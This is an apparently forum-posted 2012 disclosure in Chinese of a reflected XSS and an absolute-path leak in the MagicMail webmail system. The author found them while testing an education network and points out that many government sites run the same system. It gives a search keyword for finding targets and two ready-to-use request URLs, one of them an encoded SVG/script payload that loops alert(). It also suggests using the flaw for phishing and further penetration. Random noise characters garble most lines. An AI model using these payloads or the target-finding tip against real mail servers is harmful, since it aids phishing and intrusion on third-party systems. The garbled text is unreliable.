今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞' { F8 h% B1 n9 P
2 x4 R+ w* {. D; R T4 q V, R% V B0 A( d1 t O, V
包含 一个反射性XSS 以及 绝对路径泄漏
; i% f5 g& F5 e: {5 G看了看 貌似全部是linux的。! S( S$ M S2 Y4 P4 I
+ I( T$ z5 e& z. K7 l9 \; s8 \5 T
关键字:迈捷邮件系统 by MagicMail9 |1 w& K( Y) A' U }' l& o. @! M
3 C& U2 N! _, d; L6 s
可以看到很多政府网站都用这个邮件系统
6 d3 F o- }& n }6 v4 T2 S
. U+ w; K) j. }4 { `& _绝对路径 http://madman.in/index.php?login_type=declare&language=
* C7 g2 d5 M* Q1 F5 A3 _; a' i+ j0 I; p# Q0 }* R
]' H) B( ~3 l. d+ o: e5 w
& |8 N* @* Q6 [3 \! n( ?: L# L- G
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
# w i( c6 U" t/ M' p; ^' I& N8 t2 |0 B- S* u: Z& d
9 m* g8 Y0 b( V1 Y
9 k% z) d; Q1 U
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等8 J' [ q8 K5 T4 _0 S& X$ N! [
}: }; M0 o ?# y修复方案:看官方补丁吧。
2 j9 i, N" V; c: s |
发表于 2012-11-9 20:38:41
收藏
支持
反对